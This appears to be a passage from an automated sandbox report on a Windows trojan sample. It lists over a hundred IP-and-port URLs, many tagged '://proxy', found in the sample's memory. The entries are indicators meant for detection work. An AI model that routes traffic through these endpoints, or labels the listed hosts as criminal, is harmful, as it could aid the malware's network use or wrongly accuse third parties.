                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.83.116.6:62583://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.83.116.7:61959
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.83.116.7:61959://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.83.135.35:2846
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.83.135.35:2846://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1CE000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.83.140.70:8181
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6895000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.83.140.70:8181://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.83.184.241:9191
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.83.184.241:9191://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.83.34.150:34214
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.83.34.150:34214://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.116.108:16276
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.116.108:16276://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.135.175:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.135.175:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7733000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.4
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:17982
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:17982://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:20435
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:20435://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:23313
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:23313://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C69D9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C69D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:23854
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C69D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:23854://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:26545
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:26545://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:44719
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:44719://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAEE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:51511
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAEE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:51511://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:54570
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:54570://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8F42000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:55198
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8F5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:55198://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.91.13.215:55637
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.91.13.215:55637://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.91.151.47:53341
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.91.151.47:53341://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.172.1.186
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.172.1.186://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6712000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.172.1.186:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.172.1.186:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.172.1.186:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C924A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.191.208.232
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.191.208.232://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.191.208.232:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.196.1.182
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.196.1.182://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.196.1.182:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.236.0.6:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.236.0.6:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.24.80.166
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.24.80.166://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.24.80.166:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.41.249.10
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.41.249.10://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.41.249.10:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.47.137.181
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.47.137.181://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.47.137.181:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD07F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.79.107.158:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD07F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.79.107.158:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.161.67.134:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.161.67.134:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6DA8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.178.159.199:18080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6DB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.178.159.199:18080://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.248.238.11
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.248.238.11://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.248.238.11:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.36.108.149:13304
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.36.108.149:13304://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C695D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.36.108.149:13331
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.36.108.149:13331://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA4C1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CABDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.36.108.149:13882
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA4C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.36.108.149:13882://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.36.108.149:40996
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.36.108.149:40996://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.36.108.149:5170
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.36.108.149:5170://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C70EF000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.36.108.149:56367
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.36.108.149:56367://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.36.81.217:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.36.81.217:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.38.176.200:12882
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.38.176.200:12882://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.38.176.200:36693
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.38.176.200:36693://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8EF7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8F0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.38.179.162:3774
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8F04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.38.179.162:3774://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.38.179.203:23814
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.38.179.203:23814://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8199000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C81C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.38.179.203:35032
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C81B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.38.179.203:35032://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB2D0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.38.179.203:46030
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.38.179.203:46030://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.38.179.203:60406
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.38.179.203:60406://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.39.118.40:7497
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.39.118.40:7497://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.39.50.68:20132
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.39.50.68:20132://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.39.50.68:24535
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.39.50.68:24535://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.39.50.68:44612
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.39.50.68:44612://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.39.50.68:44884
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.39.50.68:44884://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.92.199.26://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.92.199.26:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.92.199.26P
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.176.49.86
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.176.49.86://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.176.49.86:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.20.248.139:9002
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.20.248.139:9002://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.214.69.251:28643
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.214.69.251:28643://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.219.248.202:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.219.248.202:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.234.116.197
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.234.116.197://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9536000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.234.116.197:8193
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C924A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.234.116.197:8193://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C760E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.234.116.197:8197
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7602000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.234.116.197:8197://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.240.192.158:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.240.192.158:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9129000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7D8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.246.58.150:9002
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.246.58.150:9002://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.253.210.122:8888
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.253.210.122:8888://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.69.114.77:8082
